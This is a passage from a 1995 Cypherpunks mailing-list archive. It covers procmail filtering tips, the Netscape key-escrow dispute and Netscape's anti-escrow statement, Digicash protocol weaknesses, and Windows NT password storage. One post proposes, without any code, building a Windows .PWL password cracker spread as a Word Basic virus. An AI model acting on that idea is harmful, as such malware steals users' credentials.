Vecsey wrote: > Would it be possible for the Cypherpunks mailing list remailer to parse the > Subject line to include a CP: at the beginning, or some notation so that > Cypherpunk messages can be easily 'filtered' out from my Inbox? I sort mine using the "sender:" tag. Works like a charm. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: PGP Signed with PineSign 2.2 iQCVAwUBMMir1TokqlyVGmCFAQGcngQAwbu8k2KPb21zxoNIoMwrcByaSGpl1pk1 JxdSaTq+JYWgIzJEVYbnP41ftV08XyPcovQdQe+2GF/pjVBFlV4ZE/QmVx5JtoWr gu8otJkGvN1MLLJA1isSBqkFr5HCLtcRJXRv5Xl0qLz7narhbbwfoxYUHTX3obC9 wN/u4wxPKpE= =k1z1 -----END PGP SIGNATURE----- ____ Robert A. Hayden <=> hayden at krypton.mankato.msus.edu \ /__ Finger for Geek Code Info <=> Finger for PGP Public Key \/ / -=-=-=-=-=- -=-=-=-=-=- \/ http://krypton.mankato.msus.edu/~hayden/Welcome.html -----BEGIN GEEK CODE BLOCK----- Version: 3.1 GED/J d-- s:++>: a-- C++(++++)$ ULUO++ P+>+++ L++ !E---- W+(---) N+++ o+ K+++ w+(---) O- M+$>++ V-- PS++(+++)>$ PE++(+)>$ Y++ PGP++ t- 5+++ X++ R+++>$ tv+ b+ DI+++ D+++ G+++++>$ e++$>++++ h r-- y+** ------END GEEK CODE BLOCK------ From gnu at toad.com Fri Dec 8 15:27:59 1995 From: gnu at toad.com (John Gilmore) Date: Fri, 8 Dec 95 15:27:59 PST Subject: Rally in SanFran meatspace to protest censorship in cyberspace! Message-ID: <9512082327.AA23714@toad.com> Spread the word! *** NETIZENS!! RALLY AGAINST CENSORSHIP *** Amendment I: "Congress shall make no law ... abridging the freedom of speech, or of the press; or the right of the people peaceably to assemble." **PROTEST ** PROTEST ** PROTEST ** PROTEST ** PROTEST ** PROTEST ** It's like illiterates telling you what to read. On December 6 members of the House Conference Committee on Telecommunications Reform approved a proposal to censor free speech in cyberspace. If the measures are adopted, the Net and online media will become the most heavily regulated media in the United States. They *will not* enjoy the First Amendment freedoms now afforded to print media. Instead, online publishers and users will be held to a vague and patently un-Constitutional "indecency" standard. "Violators" will be subject to fines of up to $100,000 and prison terms of up to five years. In response, ALL members of the Bay Area media, online, Internet, new media, and telecommunications communities are invited to participate in a protest rally to express our outrage that the politicians in Congress (which is not even connected to the Internet!) are attempting to destroy our First Amendment rights in cyberspace, and directly attack our livelihoods. Help stop the demagogs in Washington! There is nothing "decent" about denying free speech to us, our children, and our children's children. Preserve our Constitutional rights! Join us! WHEN: Monday, December 11, 1995 12:00 - 1:00 PM WHERE: South Park (between 2nd and 3rd, Bryant and Brannon) San Francisco. SPEAKERS: To be announced [including John Gilmore, Jim Warren, Dave Winer, Mike Godwin, Howard Rheingold] BRING: Attention-grabbing posters, signs, and banners that demonstrate your committment to free speech and expression, and your feelings about Congress. FOR UPDATED INFORMATION: http://www.hotwired.com/staff/digaman (Although this event is being organized in the offices of Wired magazine and HotWired, we are *actively* seeking participation and support from all members of the local community. Please forward this message to anyone you think should attend, and to all relevant news groups.) CONTACT: Todd Lappin -- 415-222-6241 -- protest at wired.com From oracle1 at shell02.ozemail.com.au Fri Dec 8 16:53:54 1995 From: oracle1 at shell02.ozemail.com.au (Craig Massey) Date: Fri, 8 Dec 95 16:53:54 PST Subject: Oracle of Man Message-ID: <4aaa5a$8mi@shell02.ozemail.com.au> Whatever your Newsgroup interest may be, The fact that you are using the Internet, means that you are part of the greatest explosion of information technology (IT) in the history of mankind. Computer developments are well documented but the future of artificial intelligence is limited only by our imagination. Paul Phillips, owner of one of the largest IT companies in Australia, has written a compelling book which is raising controversy and arguments throughout the world. His disturbing and unnerving prediction is that we are now close to a breakthrough in the race to give computers a conscious intelligence. This will give them the ability to interface with human beings. This giant leap forward brings the incredible possibility of being able to "download" our whole psyche. This will include our personality, intelligence and knowledge transfering into Technological Life Forms" or "TLF's", to give ourselves eternal life. For further information, please visit our Web page on http://www.oracle_of_man.aust.com From jamesd at echeque.com Fri Dec 8 17:17:26 1995 From: jamesd at echeque.com (James A. Donald) Date: Fri, 8 Dec 95 17:17:26 PST Subject: Netscape speaks with a forked tongue: Message-ID: <199512090118.RAA10458@blob.best.net> Netscape speaks with a forked tongue: Jim Clark, top guy and owner of netscape, has issued a statement in support of government access to keys: "To secure Net communications, the government will need to have access to private data exchanges using what is known as a key escrow security system " and he has issued a statement that Jeff (a netscape employee) has very generously interpreted as anti GAK. (Government access to keys) The only clear and authoritative statement issued by Netscape on GAK is Jim Clark's speech in support of GAK. Everything else is a cloud of unintelligible fog, or was issued by people with no authority and given a minimum of publicity. Jim Clark's supposedly anti GAK statement was incomprehensible to me. Perhaps he needs a punchier ghostwriter: I offer my services free of charge. :-) If Jim Clark wishes to persuade us that his heart is in the right place, he should put something like the following somewhere on the Netscape web pages: "Our customers do not want government access to their cryptographic keys. Mandatory government access to keys violates the rights of our customers. Therefore we will not foist government access to keys on those customers who have freedom to communicate securely. We will only build government access to keys into our products for those customers whose governments force them to provide such access. " If that really is Netscape's policy, then they should tell the world that that really is Netscape's policy, thus instantly relieving the fear, uncertainty, and doubt created by the unfortunate widespread misinterpretation of Jim Clark's original statements. The only clear and authoritative statement issued by Netscape on GAK is Jim Clark's speech in support of GAK. Everything else is a cloud of unintelligible fog, or was issued by people with no authority and given a minimum of publicity. --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we are. True law derives from this right, not from the arbitrary power of the omnipotent state. http://www.jim.com/jamesd/ James A. Donald jamesd at echeque.com From djw at pdcorp.com Fri Dec 8 19:04:14 1995 From: djw at pdcorp.com (Dan Weinstein) Date: Fri, 8 Dec 95 19:04:14 PST Subject: Netscape speaks with a forked tongue: In-Reply-To: <199512090118.RAA10458@blob.best.net> Message-ID: <30c8fb21.576667@email.pdcorp.com> On Fri, 08 Dec 1995 01:13:51 GMT James a Donald wrote: >Netscape speaks with a forked tongue: > >Jim Clark, top guy and owner of netscape, has issued a statement in >support of government access to keys: > > > "To secure Net communications, the government > will need to have access to private data exchanges using > what is known as a key escrow security system > " > >and he has issued a statement that Jeff (a netscape employee) has very >generously interpreted as anti GAK. (Government access to keys) You are quoting a reporter and attributing it to Jim Clark, do you understand what is wrong with that? You need to specify that this is not his statement, but a report of the jist of his comments. >The only clear and authoritative statement issued by Netscape on GAK >is Jim Clark's speech in support of GAK. Everything else is a cloud of >unintelligible fog, or was issued by people with no authority and >given a minimum of publicity. It has been reported by those that attended the Clipper II meeting on Monday(?) that the Netscape representative read an official statement very much in opposition to GAK. As far as I know, Clark was not speaking for Netscape when he was making the speach that you have refered to. Unless you believe that an employee of a company is always speaking for the company when they speak in public or you have some information I am unaware of, you are presuming that Clark's opinions are thos of Netscape. >Jim Clark's supposedly anti GAK statement was incomprehensible to me. >Perhaps he needs a punchier ghostwriter: Clark's statement was certainly something less than clearly in oposition to GAK, but I think at worst he could be said to be resigned to GAK, not a supporter of it. >I offer my services free of charge. :-) > >If Jim Clark wishes to persuade us that his heart is in the right >place, he should put something like the following somewhere on the >Netscape web pages: > > "Our customers do not want government access to > their cryptographic keys. Mandatory government > access to keys violates the rights of our > customers. Therefore we will not foist > government access to keys on those customers > who have freedom to communicate securely. > > We will only build government access to keys > into our products for those customers whose > governments force them to provide such access. > " > >If that really is Netscape's policy, then they should tell the world >that that really is Netscape's policy, thus instantly relieving the >fear, uncertainty, and doubt created by the unfortunate widespread >misinterpretation of Jim Clark's original statements. Jeff Weinstein has promised that when the representative from the conference returns to Mountain View, they will publish his statement on web. >The only clear and authoritative statement issued by Netscape on GAK >is Jim Clark's speech in support of GAK. Everything else is a cloud of >unintelligible fog, or was issued by people with no authority and >given a minimum of publicity. Again, you seem fixated on making Clark's opinions equivelent to the position of Netscape Communications Corp, this is not a reasonable assumption. Dan Weinstein djw at pdcorp.com http://www.earthlink.net/~danjw PGP public key is available from my Home Page. All opinions expressed above are mine. "I understand by 'freedom of Spirit' something quite definite - the unconditional will to say No, where it is dangerous to say No. Friedrich Nietzsche From andrew_loewenstern at il.us.swissbank.com Fri Dec 8 19:08:51 1995 From: andrew_loewenstern at il.us.swissbank.com (Andrew Loewenstern) Date: Fri, 8 Dec 95 19:08:51 PST Subject: Still more on the Digicash protocol Message-ID: <9512082354.AA02244@ch1d157nwk> David A Wagner writes: > >Tough!? It's trivial for an active attacker, in the stream cipher case. > >He just xors some bits: no clever cryptanalysis needed. (Or did you mean > >it's tough to mount an active attack? I agree: that requires significant > >knowledge or motivation.) Rev. Mark Grant responds: > Exactly.. once you have an active attack set up, it's trivial, but > setting that up is quite hard. But setting up an active attack is probably a hell of a lot easier than breaking 128-bit RC-4 (or even 64-bit). andrew From anonymous-remailer at shell.portal.com Fri Dec 8 19:25:22 1995 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Fri, 8 Dec 95 19:25:22 PST Subject: SpeakFree (Internet real-time voice w/encryption?) Message-ID: <199512090325.TAA11218@jobe.shell.portal.com> Has anybody seen, used or hacked with SpeakFree? Supposedly it's a kind of internet-phone that has IDEA/DES encryption options, plus another option to exchange encryption keys with PGP... The URL is http://www.fourmilab.ch/speakfree/windows/ From llurch at networking.stanford.edu Fri Dec 8 19:50:37 1995 From: llurch at networking.stanford.edu (Richard Charles Graves) Date: Fri, 8 Dec 95 19:50:37 PST Subject: Windows .PWL cracker implemented as a Word Basic virus? Message-ID: <199512090351.TAA29699@Networking.Stanford.EDU> Just an idea. It would be huge, but can anyone think of a reason it would not be technically feasible? Also, does NT use the same algorithm for saving network passwords? -rich From grendel at netaxs.com Fri Dec 8 19:53:48 1995 From: grendel at netaxs.com (Michael Handler) Date: Fri, 8 Dec 95 19:53:48 PST Subject: CP: Mailing List Subjects In-Reply-To: Message-ID: On Fri, 8 Dec 1995, Laszlo Vecsey wrote: > Would it be possible for the Cypherpunks mailing list remailer to parse the > Subject line to include a CP: at the beginning, or some notation so that > Cypherpunk messages can be easily 'filtered' out from my Inbox? Um, it already does. Learn procmail. It'll save you hours upon hours of time. :0: * (^From owner-cypherpunks at toad\.com|^Sender: owner-cypherpunks at toad\.com) lists/cypherpunks From dan at milliways.org Fri Dec 8 21:46:21 1995 From: dan at milliways.org (Dan Bailey) Date: Fri, 8 Dec 95 21:46:21 PST Subject: Windows .PWL cracker implemented as a Word Basic virus Message-ID: <199512090547.FAA21624@pop01.ny.us.ibm.net> On Fri, 8 Dec 1995 19:51:55 -0800 you wrote: > >Also, does NT use the same algorithm for saving network passwords? > No, but they're doing something that makes me very uncomfortable: As I read this, they're hashing the password and some other user information using MD4 then doing some proprietary permutations on that. Given their record with security, I'd rather they used straight MD4, rather than throwing in something that we can't analyze. Dan Bailey >From the Microsoft Knowledge Base article Q102716 Storage of the Passwords in the SAM Database -------------------------------------------- User records are stored in the security accounts manager (SAM) database. Each user has two passwords with which it is associated: the LAN Manager compatible password and the Windows NT password. Each password is stored doubly encrypted in the SAM database. The first encryption is a one-way function (OWF) version of the clear text generally considered to be non-decryptable. The second encryption is an encryption of the user's relative ID (RID). The second encryption is decryptable by anyone who has access to the double-encrypted password, the user's RID, and the algorithm. The second encryption is used for obfuscation purposes. [snip] The Windows NT password is based on the Unicode character set, is case sensitive, and can be up to 128 characters long. The OWF version (called the Windows NT OWF password) is computed using the RSA MD-4 encryption algorithm, which computes a 16-byte "digest" of a variable length string of clear text password bytes. *************************************************************** #define private public dan at milliways.org Worcester Polytechnic Institute and The Restaurant at the End of the Universe *************************************************************** From unicorn at schloss.li Fri Dec 8 22:14:54 1995 From: unicorn at schloss.li (Black Unicorn) Date: Fri, 8 Dec 95 22:14:54 PST Subject: Escrow expectations In-Reply-To: <199512081417.JAA03121@homeport.org> Message-ID: On Fri, 8 Dec 1995, Adam Shostack wrote: > > If there is no expectation of privacy when a key is escrowed > with Bob, or my companies attorneys, then would there be any > expectation of privacy under Clipper? Perhaps this is a powerful > argument we should expect to have used against us... > > "Your honor, we argue that in escrowing his keys with the US > government, the defendant should have known his communications could > be listened to, and thus has no expectation of privacy." Uh, this was the entire point of that thread "is a lawyer in the house" yes. > > > Adam > > -- > "It is seldom that liberty of any kind is lost all at once." > -Hume > > --- My prefered and soon to be permanent e-mail address: unicorn at schloss.li "In fact, had Bancroft not existed, potestas scientiae in usu est Franklin might have had to invent him." in nihilum nil posse reverti 00B9289C28DC0E55 E16D5378B81E1C96 - Finger for Current Key Information From llurch at networking.stanford.edu Fri Dec 8 22:15:44 1995 From: llurch at networking.stanford.edu (Rich Graves) Date: Fri, 8 Dec 95 22:15:44 PST Subject: NT v. Win95 Passwords (was Re: Windows .PWL cracker implemented as a Word Basic virus) In-Reply-To: <199512090547.FAA21624@pop01.ny.us.ibm.net> Message-ID: On Sat, 9 Dec 1995, Dan Bailey wrote: > On Fri, 8 Dec 1995 19:51:55 -0800 you wrote: > > > > >Also, does NT use the same algorithm for saving network passwords? > > > No, but they're doing something that makes me very uncomfortable: As > I read this, they're hashing the password and some other user > information using MD4 then doing some proprietary permutations on > that. Given their record with security, I'd rather they used straight > MD4, rather than throwing in something that we can't analyze. > Dan Bailey > > >From the Microsoft Knowledge Base article Q102716 That would be http://www.microsoft.com/kb/bussys/winnt/q102716.htm. Seems reasonable to me. It's good enough for NT to get the guvment's imprimatur for the guvment's own use. Does anyone have any technical information on the problem referred to in http://www.microsoft.com/KB/PEROPSYS/windows/Q131675.htm (below)? It says "The password encryption method used by Windows NT is different from the method used by Windows 95," and offers some curious workarounds. Microsoft has not been very cooperative. In other news (just to combine four subjects in one message), in our meeting with Microsoft today on DHCP issues (that's in the gopher archive; finger me), a Highly Placed Source said that Microsoft would release the details on the new Win95 .PWL encryption Soon, and that a release candidate is in internal beta testing now, but that there would be no outside testing prior to the public release. Q131675 SYMPTOMS You may not be able to connect to a shared folder on a Windows 95 computer from a Microsoft Windows NT workstation. CAUSE The password encryption method used by Windows NT is different from the method used by Windows 95. RESOLUTION You may be able to work around this problem by using one of the following methods: - Use all uppercase or all lowercase characters in the Windows 95 shared folder password. - Remove password protection from the shared folder. - Use user-level access control instead of share-level access control. STATUS Microsoft is researching this problem and will post new information here in the Microsoft Knowledge Base as it becomes available. From anonymous-remailer at shell.portal.com Fri Dec 8 22:43:21 1995 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Fri, 8 Dec 95 22:43:21 PST Subject: CP: Mailing List Subjects Message-ID: <199512090643.WAA26800@jobe.shell.portal.com> On Fri, 8 Dec 1995, Michael Handler wrote: > Learn procmail. It'll save you hours upon hours of time. > > :0: > * (^From owner-cypherpunks at toad\.com|^Sender: owner-cypherpunks at toad\.com) > lists/cypherpunks Would the following work?? :0 * (^From|^Sender).*owner-cypherpunks at toad.com |/usr/bin/contrib/procmail -m ~/.punk_rc Does anyone know where the procmail archives are?? That might help some of us out, especially those of use who are lousy at managing our very, very precious resources. Alice de 'nonymous ... ...just another one of those... P.S. This post is in the public domain. C. S. U. M. O. C. L. U. N. E. From ddt at lsd.com Fri Dec 8 22:50:54 1995 From: ddt at lsd.com (Dave Del Torto) Date: Fri, 8 Dec 95 22:50:54 PST Subject: [FYI] Corp.Spooks Outed + W3 Proxy Filters Message-ID: PRIVACY INTERNATIONAL's BIG BROTHER INCORPORATED. A Report on the Int'l Trade in Surveillance Technology and its Links to the Arms Industry. "WebFilter" (formerly "NoShit") From twcook at cts.com Fri Dec 8 23:06:23 1995 From: twcook at cts.com (Tim Cook) Date: Fri, 8 Dec 95 23:06:23 PST Subject: Netscape speaks with a forked tongue: Message-ID: > > Again, you seem fixated on making Clark's opinions equivelent to the > position of Netscape Communications Corp, this is not a reasonable > assumption. Given Clark's position, I believe it is a reasonable assumption. Unless of course you hold that the Corp. as a legal entity could have a seperate position. In that case then WHO speaks for the corporation? Some lower level PR person? I don't think so.... Tim Cook, Mindsource(tm) Librarian. "The World is a Database - Mindsource is the Search Engine." ______________________________________________________________ M I N D S O U R C E (TM) I N F O R M A T I O N N E T W O R K Send a blank Email to:mindsource at memo.net for full information Visit our W3 Site http://www.ultimate.org/mindsource/main.html D E S T I N E D FOR G L O B A L D I S T R I B U T I O N! Concept:"The Greatest Untapped Resource is Human Resource(TM)" Mindsource is a Reg. Trademark Copyright(c)1995 by Mindsource From jamesd at echeque.com Fri Dec 8 23:23:53 1995 From: jamesd at echeque.com (James A. Donald) Date: Fri, 8 Dec 95 23:23:53 PST Subject: Netscape speaks with a forked tongue: Message-ID: <199512090724.XAA01834@blob.best.net> At 03:11 AM 12/9/95 GMT, Dan Weinstein wrote: > You are quoting a reporter and attributing it to Jim Clark, do you > understand what is wrong with that? Jim Clark has had ample opportunity to clarify his statements. He has not clarified his statements and he has not disowned the reported version of his comments, despite repeated requests to do so. Once again I request him to do so. Once again I ask what he means, once again I complain that if that is not what he meant, he should now say something that is unambiguously different from what he was reported as saying. >It has been reported by those that attended the Clipper II meeting on >Monday(?) that the Netscape representative read an official statement >very much in opposition to GAK. I have not seen this statement, and I have asked for it: Once again I ask for it. In particular I ask that it be placed on their web if it says what they say that it says. > > Jim Clark's supposedly anti GAK statement was incomprehensible to me. > > Perhaps he needs a punchier ghostwriter: > Clark's statement was certainly something less than clearly in > opposition to GAK, but I think at worst he could be said to be resigned > to GAK, not a supporter of it. It was worse than that: he said nothing at all, the "clarification" statement was a cloudy fog. > > If Jim Clark wishes to persuade us that his heart is in the right > > place, he should put something like the following somewhere on the > > Netscape web pages: > > > > "Our customers do not want government access to > > their cryptographic keys. Mandatory government > > access to keys violates the rights of our > > customers. Therefore we will not foist > > government access to keys on those customers > > who have freedom to communicate securely. > > > > We will only build government access to keys > > into our products for those customers whose > > governments force them to provide such access. > > " > > > > If that really is Netscape's policy, then they should tell the world > > that that really is Netscape's policy, thus instantly relieving the > > fear, uncertainty, and doubt created by the unfortunate widespread > > misinterpretation of Jim Clark's original statements. > Jeff Weinstein has promised that when the representative from the > conference returns to Mountain View, they will publish his statement > on web. Still waiting. I am sure that by now Netscape knows what its policy is on government access to keys: I ask them to tell the world, and to tell the world in such a way that they cannot retract their words without some embarrassment. > Again, you seem fixated on making Clark's opinions equivelent to the > position of Netscape Communications Corp, this is not a reasonable > assumption. Clark is not a Netscape employee. Clark owns a controlling interest in Netscape and is chairman of the board. Netscape's policies are whatever he says they are, except in the highly unlikely event that he is opposed by both Jim Barksdale and Kleiner Perkins plus a substantial majority of the lesser shareholders. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From jamesd at echeque.com Fri Dec 8 23:24:05 1995 From: jamesd at echeque.com (James A. Donald) Date: Fri, 8 Dec 95 23:24:05 PST Subject: Netscape speaks with a forked tongue: Message-ID: <199512090725.XAA02509@blob.best.net> At 03:11 AM 12/9/95 GMT, Dan Weinstein wrote: > You are quoting a reporter and attributing it to Jim Clark, do you > understand what is wrong with that? Jim Clark has had ample opportunity to clarify his statements. He has not clarified his statements and he has not disowned the reported version of his comments, despite repeated requests to do so. Once again I request him to do so. Once again I ask what he means, once again I complain that if that is not what he meant, he should now say something that is unambiguously different from what he was reported as saying. >It has been reported by those that attended the Clipper II meeting on >Monday(?) that the Netscape representative read an official statement >very much in opposition to GAK. I have not seen this statement, and I have asked for it: Once again I ask for it. In particular I ask that it be placed on their web if it says what they say that it says. > > Jim Clark's supposedly anti GAK statement was incomprehensible to me. > > Perhaps he needs a punchier ghostwriter: > Clark's statement was certainly something less than clearly in > opposition to GAK, but I think at worst he could be said to be resigned > to GAK, not a supporter of it. It was worse than that: he said nothing at all, the "clarification" statement was a cloudy fog. > > If Jim Clark wishes to persuade us that his heart is in the right > > place, he should put something like the following somewhere on the > > Netscape web pages: > > > > "Our customers do not want government access to > > their cryptographic keys. Mandatory government > > access to keys violates the rights of our > > customers. Therefore we will not foist > > government access to keys on those customers > > who have freedom to communicate securely. > > > > We will only build government access to keys > > into our products for those customers whose > > governments force them to provide such access. > > " > > > > If that really is Netscape's policy, then they should tell the world > > that that really is Netscape's policy, thus instantly relieving the > > fear, uncertainty, and doubt created by the unfortunate widespread > > misinterpretation of Jim Clark's original statements. > Jeff Weinstein has promised that when the representative from the > conference returns to Mountain View, they will publish his statement > on web. Still waiting. I am sure that by now Netscape knows what its policy is on government access to keys: I ask them to tell the world, and to tell the world in such a way that they cannot retract their words without some embarrassment. > Again, you seem fixated on making Clark's opinions equivelent to the > position of Netscape Communications Corp, this is not a reasonable > assumption. Clark is not a Netscape employee. Clark owns a controlling interest in Netscape and is chairman of the board. Netscape's policies are whatever he says they are, except in the highly unlikely event that he is opposed by both Jim Barksdale and Kleiner Perkins plus a substantial majority of the lesser shareholders. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From futplex at pseudonym.com Fri Dec 8 23:37:36 1995 From: futplex at pseudonym.com (Futplex) Date: Fri, 8 Dec 95 23:37:36 PST Subject: Still more on the Digicash protocol In-Reply-To: <199512082234.OAA02297@ix9.ix.netcom.com> Message-ID: <199512090738.CAA09330@opine.cs.umass.edu> Mark Twain Bank Ecash Support writes: > DigiCash agrees that it is desirable to encrypt the payment request. The > problem is how? You can't use the payor's public key, since the payor is > anonymous to the payee. Bill Stewart writes: # Obviously if the payer is the one transmitting the message, she doesn't # use her public key to encrypt; hers would be used for signature if # appropriate. # She should use the payee's public key, [...] But the payment request is sent from the shop (payee) to the customer (payor). -Futplex "Women need a reason to have sex; men just need a place" -from a fitness mag. From djw at pdcorp.com Fri Dec 8 23:41:26 1995 From: djw at pdcorp.com (Dan Weinstein) Date: Fri, 8 Dec 95 23:41:26 PST Subject: Netscape speaks with a forked tongue: In-Reply-To: Message-ID: <30c93ded.17679242@email.pdcorp.com> On Fri, 8 Dec 1995 23:03:48 +0000, twcook at cts.com wrote: >> >> Again, you seem fixated on making Clark's opinions equivelent to the >> position of Netscape Communications Corp, this is not a reasonable >> assumption. > > Given Clark's position, I believe it is a reasonable assumption. >Unless of course you hold that the Corp. as a legal entity could have >a seperate position. In that case then WHO speaks for the >corporation? Some lower level PR person? I don't think so.... My point is that anyone at any level can make two different types of statements, those for themselves and those for the company. If Jim Clark makes a statement as the President of Netscape, then he is speaking for Netscape. If he makes a statement as Jim Clark, then he is speaking for Jim Clark. It is possible to not believe in something ethically, yet see a financial advantage in supporting it. Their is a distinction that must be made, though admitedly the line does become fuzzy when a senior person makes a statement, this is because he is often the one driving the policy. Dan Weinstein djw at pdcorp.com http://www.earthlink.net/~danjw PGP public key is available from my Home Page. All opinions expressed above are mine. "I understand by 'freedom of Spirit' something quite definite - the unconditional will to say No, where it is dangerous to say No. Friedrich Nietzsche From attila at primenet.com Fri Dec 8 23:42:00 1995 From: attila at primenet.com (attila) Date: Fri, 8 Dec 95 23:42:00 PST Subject: CP: Mailing List Subjects In-Reply-To: Message-ID: set up and run 'procmail' --you can create folders for each list, or you can relegate whatever else with great flexibility to /dev/null/. additionally, procmail allows piped commands through external processes. there is absolutely no need to add CP to "Subject:" On Fri, 8 Dec 1995, Laszlo Vecsey wrote: > Would it be possible for the Cypherpunks mailing list remailer to parse the > Subject line to include a CP: at the beginning, or some notation so that > Cypherpunk messages can be easily 'filtered' out from my Inbox? > > Also, about Microsoft's .PWL file format. Will they be releasing the > new encryption method? Or are we not supposed to feel safe that our > passwords are protected in Windows95. > From futplex at pseudonym.com Sat Dec 9 00:14:32 1995 From: futplex at pseudonym.com (Futplex) Date: Sat, 9 Dec 95 00:14:32 PST Subject: Win NT proprietary pw encryption (Was: Re: Windows .PWL cracker implemented as a Word Basic virus) In-Reply-To: <199512090547.FAA21624@pop01.ny.us.ibm.net> Message-ID: <199512090815.DAA08976@opine.cs.umass.edu> Dan Bailey writes: # No, but they're doing something that makes me very uncomfortable: As # I read this, they're hashing the password and some other user # information using MD4 then doing some proprietary permutations on # that. Given their record with security, I'd rather they used straight # MD4, rather than throwing in something that we can't analyze. I don't quite agree with the last part. It might be educational to do a spot of cryptanalysis in an attempt to determine the nature of the proprietary algorithm used. It wouldn't be "cracking" the password protection, but I think the general effort to "out" proprietary crypto algorithms is productive, particularly in the case of major software packages. Microsoft Knowledge Base article Q102716 says: > Storage of the Passwords in the SAM Database [...] > The second encryption is decryptable by anyone who has access to the > double-encrypted password, the user's RID, and the algorithm. The second > encryption is used for obfuscation purposes. Anyone feel like putting together some sample plaintext/ciphertext pairs ? -Futplex From jwhiting at igc.apc.org Sat Dec 9 00:22:55 1995 From: jwhiting at igc.apc.org (Jerry Whiting) Date: Sat, 9 Dec 95 00:22:55 PST Subject: More elveator problem Message-ID: <199512090823.AAA15124@igc2.igc.apc.org> More on The Elevator Problem: I'll confess that we're working on a new private key encryption product. Free and clear of existing claims on intellectual property, I'd like a protocol that answers the elevator problem: how can Alice and Bob agree on a private key via a compromised channel? I don't want them to meet under a street lamp and whisper in each other's ears _before_ trying to establish a secret on a crowded elevator. I'm willing to accept that the basic question is undoable without stepping on DH et al., I just don't want to give up until all parties are convinced it can't be done. As I stated in my original post, we're willing to consider less-than-perfect implimentations if we can quantify mathematically the risk involved. In some scenarios, Alice and Bob might not expect any Eve's in the crowded elevator or value the content at such a price that they're willing to live with less than 100%. As long as we can document the risk, the end user can make the decision as to whether the risk is worth it. Something that I neglected to mention before is that Alice and Bob do have a unique ID within this system, not that they necessarily know each others. If one assumes that they do, they then share a secret: the knowledge of each other's unique ID. Another segment of our attention is being spent daydreaming about the potential applications of a secondary channel in the cleartext portion of a crypto "package" or "bundle". The comment about secondary channels that I believe Tim made regarding the inmates and the warden is something we discuss in our spare time. Then again the wheels of justice doth turn and patents ain't forever... Jerry Whiting jwhiting at azalea.com From jsw at netscape.com Sat Dec 9 01:20:12 1995 From: jsw at netscape.com (Jeff Weinstein) Date: Sat, 9 Dec 95 01:20:12 PST Subject: Netscape announces position against GAK Message-ID: <30C953EC.28BA@netscape.com> I've included below the official Netscape position against GAK. This page is now available on our web site at the URL below. I'm sorry that we were not able to get this out earlier in the week, but we ran into some delays due to travel schedules (people attending the NIST meeting), and some logistical problems due to large changes on our web site. There is a link to this document on our home page, http://home.netscape.com/, which gets accessed more than 1 million times per day. I would appreciate it if people who forwarded parts of the recent Netscape/GAK discussion to other forums would at least send them the URL for this page. --Jeff http://home.netscape.com/newsref/ref/encryption_export.html > NETSCAPE PRESENTS POLICY ON ENCRYPTION EXPORT TO KEY MEMBERS OF THE > ADMINISTRATION AND CONGRESS > > ---------------------------------------------------------------------- > > This week Netscape representatives attending a government presentation > of the administration's proposed Key Escrow Policy for Export detailed > the company's firm opposition to the proposed policy. Netscape is > opposed to this type of proposal for a number of reasons including its > failure to adequately address the issues of acceptability by foreign > governments and corporations, significant personal privacy concerns, > and the mandatory nature of tying the Exportable Key Size to the Key > Escrow Proposal. > > At present the proposed Key Escrow Policy for Export states that a > U.S. Government-approved key escrow process must be used by U.S. > software manufacturers if they wish to export commodity encryption > products of a key length up to 64 bits. Currently, Netscape can only > provide its non-U.S. customers with products containing a 40-bit key. > It has been Netscape's experience that non-U.S. customers demand > products as cryptographically strong as those that are available to > U.S. customers (i.e., at least 128-bit key length). Hence, the current > U.S. Government proposal is compelling software companies like > Netscape to manufacture two different versions of its products - an > inefficient and noncompetitive posture that does not meet the needs of > the foreign markets. > > Netscape believes that this division in the global marketplace is not > compatible with the nature, structure, and history of the Internet and > its users. In addition, the 64-bit key length size in the U.S. > Government proposal is inadequate for security purposes; recent > experience in the United States and other countries demonstrates that > a 64-bit key can be compromised. Therefore, Netscape believes that the > U.S. Government's proposal does not support the needs of industry. > > In particular: > > 1. The U.S. Government proposal imposes regulations that will not > scale up to the speed at which the information > technology/Internet software industry continues to develop. The > proposed process represents a regulatory burden that is not > consistent with the decentralized and agile nature of the > IT/Internet business. The proposal puts at risk significant > economic stability not just for U.S.-based IT firms but for the > U.S. economy as a whole as every sector's growth is fueled by the > increasing availability and innovative use of information > products and services. > > 2. The U.S. Government proposal would in effect result in the > mandatory use of these export-grade products within the United > States. The proposal includes a non-interoperability criteria > that would make it impossible for a non-escrowed software product > to talk to an escrowed software product. Thus, consumers inside > the United States would be forced to use a government-approved > key-escrow product if they value the ability to communicate with > others outside the United States. > > 3. Corporate and individual rights to privacy are placed in question > by the current U.S. Government escrow proposal and process. This > is so because of the mandatory nature of the proposal resulting > from the key escrow requirement itself and the oversight role > government proposes to play in the accreditation process and > business practices of an escrow agent. > > Netscape will continue to work with industry organizations, partners, > and customers who are in similar opposition to the government's > proposal to ensure that the current administration understands the > unacceptability of this plan. > > ---------------------------------------------------------------------- > > Find out more about Netscape at info at netscape.com, or call > 415/528-2555. > Copyright � 1995 Netscape Communications Corporation -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From futplex at pseudonym.com Sat Dec 9 01:59:39 1995 From: futplex at pseudonym.com (Futplex) Date: Sat, 9 Dec 95 01:59:39 PST Subject: Netscape announces position against GAK In-Reply-To: <30C953EC.28BA@netscape.com> Message-ID: <199512091001.FAA09614@opine.cs.umass.edu> (Thanks, Jeff) http://home.netscape.com/newsref/ref/encryption_export.html says (via JW): > This week Netscape representatives attending a government presentation > of the administration's proposed Key Escrow Policy for Export detailed > the company's firm opposition to the proposed policy. Netscape is > opposed to this type of proposal for a number of reasons including [...] > significant personal privacy concerns, [...] > consumers inside the United States would be forced to use a > government-approved key-escrow product if they value the ability to > communicate with others outside the United States. [...] > 3. Corporate and individual rights to privacy are placed in question > by the current U.S. Government escrow proposal and process. This > is so because of the 